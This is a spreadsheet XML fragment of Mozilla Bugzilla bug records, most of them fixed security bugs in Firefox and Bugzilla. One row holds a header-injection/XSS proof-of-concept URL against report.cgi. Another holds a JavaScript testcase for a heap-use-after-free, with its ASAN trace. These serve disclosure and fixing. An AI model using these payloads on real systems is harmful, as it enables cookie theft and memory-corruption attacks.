      <c r="I2613" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2613" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K2613" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2613" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2613" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2613" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2613" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2613" t="inlineStr">
        <is>
          <t>[adv-main24+][adv-esr1709+]</t>
        </is>
      </c>
      <c r="Q2613" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2613" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2613" t="inlineStr">
        <is>
          <t>mozilla25</t>
        </is>
      </c>
      <c r="T2613" t="n">
        <v>1</v>
      </c>
      <c r="U2613" t="n">
        <v>0</v>
      </c>
      <c r="V2613" t="n">
        <v>22</v>
      </c>
      <c r="W2613" t="inlineStr">
        <is>
          <t>In WrapNewGlobal, we created a a new XPCNativeScriptableInfo, and stash it in a AutoMarkingNativeScriptableInfoPtr to keep it (or rather its associated XPCNativeScriptableShared) alive. But in certain cases, we end up using the proto's |si|, and delete the one we created. However, we fail to null out the AutoMarkingPtr. So if we trigger a GC before the pointer goes out of scope (which is exactly what my patch in bug 897322 does), we'll end up marking garbage data, which is a use-after-free.
This is probably a regression from bug 720580, which I landed about a year and a half ago.
I'm going to hazard a guess that this is sec-high. It's a use-after-free, but mitigated in several ways. In particular, it's not clear that there's a way on trunk to trigger a GC at the right place (though I'm far from convinced that it's impossible), and it the Mark() operation is limited enough that exploiting its use-after-free behavior would be very tricky.</t>
        </is>
      </c>
      <c r="X2613" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2614">
      <c r="A2614" t="n">
        <v>245375</v>
      </c>
      <c r="B2614" t="inlineStr">
        <is>
          <t>2004-06-02 11:51:53 -0700</t>
        </is>
      </c>
      <c r="C2614" t="inlineStr">
        <is>
          <t>Scheduled whining needs custom columns</t>
        </is>
      </c>
      <c r="D2614" t="inlineStr">
        <is>
          <t>2013-02-07 02:42:33 -0800</t>
        </is>
      </c>
      <c r="E2614" t="n">
        <v>1</v>
      </c>
      <c r="F2614" t="n">
        <v>1</v>
      </c>
      <c r="G2614" t="n">
        <v>4</v>
      </c>
      <c r="H2614" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2614" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2614" t="inlineStr">
        <is>
          <t>Whining</t>
        </is>
      </c>
      <c r="K2614" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2614" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2614" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2614" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2614" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2614" t="inlineStr"/>
      <c r="Q2614" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2614" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2614" t="inlineStr">
        <is>
          <t>Bugzilla 4.4</t>
        </is>
      </c>
      <c r="T2614" t="n">
        <v>1</v>
      </c>
      <c r="U2614" t="n">
        <v>18</v>
      </c>
      <c r="V2614" t="n">
        <v>38</v>
      </c>
      <c r="W2614" t="inlineStr">
        <is>
          <t>There should be a way for the new whine scheduler to specify which columns are
listed in a message.
This could get a little bit tricky, and isn't critical to landing the scheduled
whines, so I'm putting it in its own bug.</t>
        </is>
      </c>
      <c r="X2614" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2615">
      <c r="A2615" t="n">
        <v>965982</v>
      </c>
      <c r="B2615" t="inlineStr">
        <is>
          <t>2014-01-30 13:08:19 -0800</t>
        </is>
      </c>
      <c r="C2615" t="inlineStr">
        <is>
          <t>QuotaManager: TransactionThreadPool needs to be shutdown before we shutdown IO thread</t>
        </is>
      </c>
      <c r="D2615" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E2615" t="n">
        <v>1</v>
      </c>
      <c r="F2615" t="n">
        <v>1</v>
      </c>
      <c r="G2615" t="n">
        <v>3</v>
      </c>
      <c r="H2615" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2615" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2615" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2615" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2615" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2615" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2615" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2615" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2615" t="inlineStr">
        <is>
          <t>[qa-][adv-main28+][adv-esr24.4+]</t>
        </is>
      </c>
      <c r="Q2615" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2615" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2615" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T2615" t="n">
        <v>1</v>
      </c>
      <c r="U2615" t="n">
        <v>0</v>
      </c>
      <c r="V2615" t="n">
        <v>23</v>
      </c>
      <c r="W2615" t="inlineStr">
        <is>
          <t>IO thread shutdown involves invalidation of file managers which destroy file info objects (setting database refs to zero). The problem is that there can be a running transaction that is about to lower database refs of a file info and since the file info at that time contains invalid information/database refs, the whole process will end up with destroying already destroyed file info objects.
It makes much more sense to shutdown the transaction service first and then the IO thread.
This must have been a problem for long time, but not so visible. The patch for storing big structured clones in external files makes it much more visible.
Ben says we should land this separately and get it possibly on aurora/beta too</t>
        </is>
      </c>
      <c r="X2615" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2616">
      <c r="A2616" t="n">
        <v>591165</v>
      </c>
      <c r="B2616" t="inlineStr">
        <is>
          <t>2010-08-26 21:47:59 -0700</t>
        </is>
      </c>
      <c r="C2616" t="inlineStr">
        <is>
          <t>[SECURITY] Header injection, cross-site scripting in report.cgi</t>
        </is>
      </c>
      <c r="D2616" t="inlineStr">
        <is>
          <t>2011-01-24 17:20:08 -0800</t>
        </is>
      </c>
      <c r="E2616" t="n">
        <v>1</v>
      </c>
      <c r="F2616" t="n">
        <v>1</v>
      </c>
      <c r="G2616" t="n">
        <v>4</v>
      </c>
      <c r="H2616" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2616" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2616" t="inlineStr">
        <is>
          <t>Reporting/Charting</t>
        </is>
      </c>
      <c r="K2616" t="inlineStr">
        <is>
          <t>2.17.1</t>
        </is>
      </c>
      <c r="L2616" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2616" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2616" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2616" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2616" t="inlineStr">
        <is>
          <t>(CVE-2010-2761 for original CGI.pm issue; CVE-2010-4411 for secondary issue)</t>
        </is>
      </c>
      <c r="Q2616" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2616" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2616" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T2616" t="n">
        <v>1</v>
      </c>
      <c r="U2616" t="n">
        <v>0</v>
      </c>
      <c r="V2616" t="n">
        <v>77</v>
      </c>
      <c r="W2616" t="inlineStr">
        <is>
          <t>Hi folks,
While doing something completely unrelated, I noticed that the query_format parameter passed to report.cgi is not properly sanitized when quoted in the "Location" header in the response.
This allows malicious headers or HTML body to be injected in order to steal cookies, poison reverse caches, etc. Proof-of-concept against bugzilla.mozilla.org (works in Firefox):
https://bugzilla.mozilla.org/report.cgi?x_axis_field=1&amp;y_axis_field=1&amp;z_axis_field=1&amp;query_format=report-tablebogus%0a%0dC&lt;html&gt;&lt;script&gt;alert(1)&lt;/script&gt;:%20s%0a%0a%0a%0aFOO&amp;short_desc_type=jellyfish&amp;short_desc=jellyfish&amp;product=1&amp;component=1&amp;version=1&amp;long_desc_type=jellyfish&amp;long_desc=jellyfish&amp;bug_file_loc_type=1&amp;bug_file_loc=1&amp;bug_status=1&amp;resolution=1&amp;bug_severity=1&amp;priority=1&amp;rep_platform=1&amp;op_sys=1&amp;emailassigned_to1=on&amp;emailreporter1=on&amp;emailcc1=on&amp;emaillongdesc1=on&amp;emailtype1=skipfish@example.com&amp;email1=skipfish@example.com&amp;emailassigned_to2=on&amp;emailreporter2=on&amp;emailcc2=on&amp;emaillongdesc2=on&amp;emailtype2=skipfish@example.com&amp;email2=skipfish@example.com&amp;bugidtype=1&amp;bug_id=1&amp;votes=1&amp;chfieldfrom=1&amp;chfieldto=Now&amp;chfield=1&amp;chfieldvalue=1&amp;format=table&amp;action=wrap&amp;negate0=on&amp;field0-0-0=1&amp;type0-0-0=1&amp;value0-0-0=1&amp;cmd-add0-0-1=Or&amp;cmd-add0-1-0=And&amp;cmd-add1-0-0=Add%20another%20boolean%20chart</t>
        </is>
      </c>
      <c r="X2616" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2617">
      <c r="A2617" t="n">
        <v>1128064</v>
      </c>
      <c r="B2617" t="inlineStr">
        <is>
          <t>2015-01-30 13:44:56 -0800</t>
        </is>
      </c>
      <c r="C2617" t="inlineStr">
        <is>
          <t>crash in nsPluginInstanceOwner::GetDocument(nsIDocument**)</t>
        </is>
      </c>
      <c r="D2617" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E2617" t="n">
        <v>1</v>
      </c>
      <c r="F2617" t="n">
        <v>1</v>
      </c>
      <c r="G2617" t="n">
        <v>6</v>
      </c>
      <c r="H2617" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2617" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J2617" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K2617" t="inlineStr">
        <is>
          <t>37 Branch</t>
        </is>
      </c>
      <c r="L2617" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2617" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N2617" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2617" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P2617" t="inlineStr">
        <is>
          <t>[adv-main38+]</t>
        </is>
      </c>
      <c r="Q2617" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2617" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2617" t="inlineStr">
        <is>
          <t>mozilla40</t>
        </is>
      </c>
      <c r="T2617" t="n">
        <v>1</v>
      </c>
      <c r="U2617" t="n">
        <v>0</v>
      </c>
      <c r="V2617" t="n">
        <v>26</v>
      </c>
      <c r="W2617" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-9754679b-a4c5-4ae0-a935-298c92150118.
=============================================================
It seems the volume of this signature started to go up in v37:
37.0a2 	69.27 %	 284
38.0a1 	15.85 %	 65
37.0a1 	14.39 %	 59
36.0b2 	 0.49 %	 2 
(over the past 28 days)
The Crash Address 0x5a5a5a5e worries me since it indicates a state
that might be exploitable.  All reported crashes are on Windows.
Most of the crashes have mozilla::psm::SyncRunnableBase::Run()
on the stack:
nsPluginInstanceOwner::GetDocument(nsIDocument**)
nsPluginStreamListenerPeer::GetInterfaceGlobal(nsID const&amp;, void**)
nsPluginStreamListenerPeer::GetInterface(nsID const&amp;, void**)
nsInterfaceRequestorAgg::GetInterface(nsID const&amp;, void**)
mozilla::net::nsHttpConnection::GetInterface(nsID const&amp;, void**)
nsInterfaceRequestorAgg::GetInterface(nsID const&amp;, void**)
nsGetInterface::operator()(nsID const&amp;, void**)
nsCOMPtr_base::assign_from_helper(nsCOMPtr_helper const&amp;, nsID const&amp;)
xul.dll@0x190f6df
@0x7ffdf6cb
GetInputBits
PreviousCertRunnable::RunOnTargetThread()
mozilla::psm::SyncRunnableBase::Run()
nsThread::ProcessNextEvent(bool, bool*)
...</t>
        </is>
      </c>
      <c r="X2617" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2618">
      <c r="A2618" t="n">
        <v>1378113</v>
      </c>
      <c r="B2618" t="inlineStr">
        <is>
          <t>2017-07-04 05:34:26 -0700</t>
        </is>
      </c>
      <c r="C2618" t="inlineStr">
        <is>
          <t>heap-use-after-free in mozilla::layers::ClientLayerManager::DidComposite</t>
        </is>
      </c>
      <c r="D2618" t="inlineStr">
        <is>
          <t>2024-05-30 09:34:59 -0700</t>
        </is>
      </c>
      <c r="E2618" t="n">
        <v>1</v>
      </c>
      <c r="F2618" t="n">
        <v>1</v>
      </c>
      <c r="G2618" t="n">
        <v>3</v>
      </c>
      <c r="H2618" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2618" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2618" t="inlineStr">
        <is>
          <t>Graphics: Layers</t>
        </is>
      </c>
      <c r="K2618" t="inlineStr">
        <is>
          <t>54 Branch</t>
        </is>
      </c>
      <c r="L2618" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2618" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2618" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2618" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2618" t="inlineStr">
        <is>
          <t>[gfx-noted][adv-main55+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q2618" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2618" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2618" t="inlineStr">
        <is>
          <t>mozilla56</t>
        </is>
      </c>
      <c r="T2618" t="n">
        <v>1</v>
      </c>
      <c r="U2618" t="n">
        <v>0</v>
      </c>
      <c r="V2618" t="n">
        <v>22</v>
      </c>
      <c r="W2618" t="inlineStr">
        <is>
          <t>Created attachment 8883281
05crab.svg (required for the testcase)
The following testcase crashes the latest ASAN build of Firefox (BuildID=20170703081455). It requires the attached 05crab.svg file in the same directory. Attempts to minimise the file were unsuccessful and made the testcase far less reliable.
&lt;script&gt;
function start() {
	o1=window.open('05crab.svg','popup41','width=-11,left=7,innerWidth=2621447,resizable');
	window.open('data:text/html,&lt;div&gt;','popup31','left=-2,menubar,toolbar');
	o1.onresize=fun0;
	o1.resizeTo(-26618,2);
	o1.close();
}
function fun0() {
	x=new XMLHttpRequest();
	x.open("POST","https://mozilla.org",false);
	try{x.send("test");}catch(e){}
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN report:
=================================================================
==27239==ERROR: AddressSanitizer: heap-use-after-free on address 0x6140001bb1d8 at pc 0x7f6be0f281b6 bp 0x7ffe4ec3af90 sp 0x7ffe4ec3af88
READ of size 8 at 0x6140001bb1d8 thread T0 (Web Content)
    #0 0x7f6be0f281b5 in Length /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:398:37
    #1 0x7f6be0f281b5 in mozilla::layers::ClientLayerManager::DidComposite(unsigned long, mozilla::TimeStamp const&amp;, mozilla::TimeStamp const&amp;) /home/worker/workspace/build/src/gfx/layers/client/ClientLayerManager.cpp:520
    #2 0x7f6be1018c45 in mozilla::layers::CompositorBridgeChild::RecvDidComposite(unsigned long const&amp;, unsigned long const&amp;, mozilla::TimeStamp const&amp;, mozilla::TimeStamp const&amp;) /home/worker/workspace/build/src/gfx/layers/ipc/CompositorBridgeChild.cpp:525:14
    #3 0x7f6be0288415 in mozilla::layers::PCompositorBridgeChild::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PCompositorBridgeChild.cpp:1443:20
    #4 0x7f6bdfb4253e in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2093:25
    #5 0x7f6bdfb3f354 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2019:17
    #6 0x7f6bdfb40fa4 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1888:5
    #7 0x7f6bdfb41588 in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1921:15
    #8 0x7f6bded391af in mozilla::SchedulerGroup::Runnable::Run() /home/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:367:25
    #9 0x7f6bded65f48 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1422:14
    #10 0x7f6bded6c098 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:489:10
    #11 0x7f6bdfb4a1f1 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #12 0x7f6bdfaa6be0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:320:10
    #13 0x7f6bdfaa6be0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:313
    #14 0x7f6bdfaa6be0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:293
    #15 0x7f6be514ca6f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #16 0x7f6be937fa47 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:895:22
    #17 0x7f6bdfaa6be0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:320:10
    #18 0x7f6bdfaa6be0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:313
    #19 0x7f6bdfaa6be0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:293
    #20 0x7f6be937f4ad in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:711:34
    #21 0x4eb813 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
    #22 0x4eb813 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
    #23 0x7f6bfbf4c82f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #24 0x41d168 in _start (/home/nils/fuzzer3/firefox/firefox+0x41d168)
0x6140001bb1d8 is located 408 bytes inside of 424-byte region [0x6140001bb040,0x6140001bb1e8)
freed by thread T0 (Web Content) here:
    #0 0x4bb69b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7f6be5124384 in Release /home/worker/workspace/build/src/obj-firefox/dist/include/Layers.h:180:3
    #2 0x7f6be5124384 in Release /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:40
    #3 0x7f6be5124384 in Release /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:395
    #4 0x7f6be5124384 in assign_assuming_AddRef /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:65
    #5 0x7f6be5124384 in operator= /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:166
    #6 0x7f6be5124384 in mozilla::widget::PuppetWidget::Destroy() /home/worker/workspace/build/src/widget/PuppetWidget.cpp:198
    #7 0x7f6be49ff837 in mozilla::dom::TabChild::DestroyWindow() /home/worker/workspace/build/src/dom/ipc/TabChild.cpp:1030:24
    #8 0x7f6be4a118c4 in mozilla::dom::TabChild::RecvDestroy() /home/worker/workspace/build/src/dom/ipc/TabChild.cpp:2361:3
    #9 0x7f6be018e9ae in mozilla::dom::PBrowserChild::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBrowserChild.cpp:4248:20
    #10 0x7f6be02fb19c in mozilla::dom::PContentChild::OnMessageReceived(IPC::Message const&amp;) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PContentChild.cpp:5288:28
    #11 0x7f6bdfb4253e in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2093:25
    #12 0x7f6bdfb3f354 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2019:17
    #13 0x7f6bdfb40fa4 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1888:5
    #14 0x7f6bdfb41588 in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1921:15
    #15 0x7f6bded391af in mozilla::SchedulerGroup::Runnable::Run() /home/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:367:25
    #16 0x7f6bded65f48 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1422:14
    #17 0x7f6bded6c098 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:489:10
    #18 0x7f6be4fadc95 in SpinEventLoopUntil&lt;mozilla::ProcessFailureBehavior::ReportToCaller, (lambda at /home/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:3088:31)&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:323:25
    #19 0x7f6be4fadc95 in mozilla::dom::XMLHttpRequestMainThread::SendInternal(mozilla::dom::BodyExtractorBase const*) /home/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:3088
    #20 0x7f6be4fcb846 in mozilla::dom::XMLHttpRequestMainThread::Send(JSContext*, nsAString const&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.h:379:13
    #21 0x7f6be2be4156 in mozilla::dom::XMLHttpRequestBinding::send(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::XMLHttpRequest*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/XMLHttpRequestBinding.cpp:783:13
    #22 0x7f6be3348b1e in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3028:13
    #23 0x7f6be9845724 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
    #24 0x7f6be9845724 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
    #25 0x7f6be982e54b in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
    #26 0x7f6be982e54b in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3060
    #27 0x7f6be98152c8 in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
    #28 0x7f6be98458bc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
    #29 0x7f6be9846212 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
    #30 0x7f6bea49624e in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:169:12
    #31 0x7f6bea45a629 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:359:23
    #32 0x7f6bea4763d3 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:481:21
    #33 0x7f6bea478da7 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:741:12
    #34 0x7f6be9845b6c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
    #35 0x7f6be9845b6c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:452
    #36 0x7f6be9846212 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
    #37 0x7f6bea1bce1b in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2948:12
    #38 0x7f6be2dae555 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
previously allocated by thread T0 (Web Content) here:
    #0 0x4bb9ec in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ecf0d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f6be5128fa2 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f6be5128fa2 in mozilla::widget::PuppetWidget::GetLayerManager(mozilla::layers::PLayerTransactionChild*, mozilla::layers::LayersBackend, nsIWidget::LayerManagerPersistence) /home/worker/workspace/build/src/widget/PuppetWidget.cpp:582
    #4 0x7f6be4a02bc1 in mozilla::dom::TabChild::InitRenderingState(mozilla::layers::TextureFactoryIdentifier const&amp;, unsigned long const&amp;, mozilla::layers::CompositorOptions const&amp;, mozilla::layout::PRenderFrameChild*) /home/worker/workspace/build/src/dom/ipc/TabChild.cpp:2633:24
    #5 0x7f6be4a0272d in mozilla::dom::TabChild::DoFakeShow(mozilla::layers::TextureFactoryIdentifier const&amp;, unsigned long const&amp;, mozilla::layers::CompositorOptions const&amp;, mozilla::layout::PRenderFrameChild*, mozilla::dom::ShowInfo const&amp;) /home/worker/workspace/build/src/dom/ipc/TabChild.cpp:1130:3
    #6 0x7f6be49807d7 in mozilla::dom::ContentChild::ProvideWindowCommon(mozilla::dom::TabChild*, mozIDOMWindowProxy*, bool, unsigned int, bool, bool, bool, nsIURI*, nsAString const&amp;, nsACString const&amp;, bool, bool*, mozIDOMWindowProxy**) /home/worker/workspace/build/src/dom/ipc/ContentChild.cpp:1026:13
    #7 0x7f6be49ff4f0 in mozilla::dom::TabChild::ProvideWindow(mozIDOMWindowProxy*, unsigned int, bool, bool, bool, nsIURI*, nsAString const&amp;, nsACString const&amp;, bool, bool*, mozIDOMWindowProxy**) /home/worker/workspace/build/src/dom/ipc/TabChild.cpp:1004:16
    #8 0x7f6be92eb550 in nsWindowWatcher::OpenWindowInternal(mozIDOMWindowProxy*, char const*, char const*, char const*, bool, bool, bool, nsIArray*, bool, bool, nsIDocShellLoadInfo*, mozIDOMWindowProxy**) /home/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:879:24
    #9 0x7f6be92f060f in OpenWindow2 /home/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:444:10
